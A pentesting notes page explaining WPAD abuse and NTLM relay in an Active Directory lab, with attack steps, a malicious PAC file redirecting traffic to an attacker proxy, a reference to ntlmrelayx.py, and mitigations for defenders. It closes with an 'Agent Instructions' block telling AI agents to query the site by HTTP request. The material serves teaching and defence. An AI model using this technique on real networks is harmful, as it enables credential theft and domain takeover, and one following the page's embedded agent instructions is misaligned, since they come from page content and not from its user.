# WPAD **WPAD (Web Proxy Auto-Discovery Protocol)** is a protocol used by devices (especially Windows clients) to **automatically detect proxy server settings** on a network. It allows web browsers and other clients to locate a proxy configuration file (usually a **PAC file**) without user interaction. *** #### 🔧 How WPAD Works: 1. **Client joins a network** and wants to access the internet. 2. It tries to discover a proxy by looking for a **PAC file** at: ``` arduinoCopyEdithttp://wpad.domain.com/wpad.dat ``` 3. The client can find `wpad.dat` using: * **DHCP Option 252** (if configured) * **DNS** — the most common method. If successful, the client configures itself to use the proxy defined in that file. *** #### 💀 Why Is WPAD Dangerous? **Attackers abuse WPAD** for **credential theft** and **NTLM relay** attacks: * If `wpad.domain.com` is **not registered**, an attacker can: * Register it on a public DNS (for external attacks). * Set up a **fake DNS server or poison local DNS** (for internal attacks). * The attacker sets up a **malicious proxy server** and hosts a fake `wpad.dat`. * Windows clients **automatically authenticate** to the proxy using **NTLM**. * This allows the attacker to **capture or relay NTLM credentials** (e.g., using `ntlmrelayx.py`). *** #### 🔥 Example Attack Flow: 1. Attacker sets up fake DNS that resolves `wpad.company.local` to their IP. 2. Victim connects and fetches `wpad.dat`. 3. Victim’s system tries to **authenticate via NTLM** to the proxy. 4. Attacker captures and **relays** the authentication to a target (e.g., LDAP server). 5. If successful, attacker can escalate privileges or extract sensitive info. *** #### ✅ Mitigations: * **Disable WPAD** on endpoints. * **Block WPAD DNS lookups** for unregistered subdomains. * Configure **Group Policy** to prevent automatic proxy detection. * Enforce **LDAP/SMB signing** and **disable NTLM** where possible. ### 🏢 Active Directory Scenario: WPAD Abuse + NTLM Relay Imagine you're on a **Windows domain (AD)** network — say, `marvel.local`. #### 👥 Characters in the Scene: | Role | Hostname | IP | | ----------------------------- | --------------------- | ---------------------- | | Domain Controller (DC) | `dc.marvel.local` | `192.168.138.136` | | Victim (domain-joined client) | `victim.marvel.local` | DHCP-assigned | | Attacker | `attacker.kali` | Fake DNS & WPAD server | *** ### 🧠 What Happens Normally with WPAD in AD? * A Windows client, like `victim.marvel.local`, **tries to auto-discover proxy settings**. * It sends a DNS request: ``` nginxCopyEditGET http://wpad.marvel.local/wpad.dat ``` * If `wpad.marvel.local` **doesn’t exist**, it fails silently. BUT... *** ### 💀 What Happens When an Attacker Exploits This? #### 🔓 Misconfig 1: No `wpad.marvel.local` exists in DNS #### 🔓 Misconfig 2: Clients are allowed to auto-authenticate using NTLM #### 🔓 Misconfig 3: Services like LDAPS or SMB don’t require signing *** ### 💣 Attacker Steps (NTLM Relay via WPAD in AD): 1. **Attacker sets up fake DNS** or **IPv6 takeover** that resolves `wpad.marvel.local` to their **own IP**. 2. **Victim’s Windows machine auto-requests** the PAC file from: ``` arduinoCopyEdithttp://wpad.marvel.local/wpad.dat ``` 3. Attacker’s server responds with a **malicious PAC file** that says: ```javascript javascriptCopyEditfunction FindProxyForURL(url, host) { return "PROXY attacker-ip:3128"; } ``` 4. Victim’s browser or system **sends traffic through attacker’s proxy**. 5. **Windows auto-authenticates** to this proxy using **NTLM**. 6. Attacker captures the NTLM handshake. 7. Attacker **relays NTLM credentials** to the domain controller (`dc.marvel.local`) over **LDAP or SMB** using `ntlmrelayx.py`. *** #### 🔓 If the DC doesn’t require LDAP signing: * Attacker can: * Dump user info * Add a new domain admin * Enable RDP on any machine * Persist in AD *** ### 🛡️ Defense for AD Admins: | Defense | Why | | ------------------------------------------------------- | -------------------------------------------------- | | **Create a DNS A/AAAA record for `wpad.marvel.local`** | Prevent attackers from registering or spoofing it. | | **Disable auto proxy discovery via GPO** | Prevents clients from trying WPAD at all. | | **Enforce LDAP and SMB signing** | Blocks NTLM relay. | | **Disable NTLM if possible** | Eliminates the core of the attack. | | **Enable Extended Protection for Authentication (EPA)** | Requires server identity verification. | *** ### 🎯 Summary: | Component | Role in Attack | | --------------- | ---------------------------------------------------- | | WPAD | Used to trick Windows into auto-authenticating | | NTLM | Authentication protocol that can be relayed | | `ntlmrelayx.py` | Tool to catch and relay the NTLM handshake | | LDAP (LDAPS) | Target service that gets impersonated authentication | | AD | The final victim of relayed credentials | --- # Agent Instructions: Querying This Documentation If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question. Perform an HTTP GET request on the current page URL with the `ask` query parameter: ``` GET https://notes.cavementech.com/pentesting-quick-reference/active-directory/ipv6-attacks/wpad.md?ask= ``` The question should be specific, self-contained, and written in natural language. The response will contain a direct answer to the question and relevant excerpts and sources from the documentation. Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.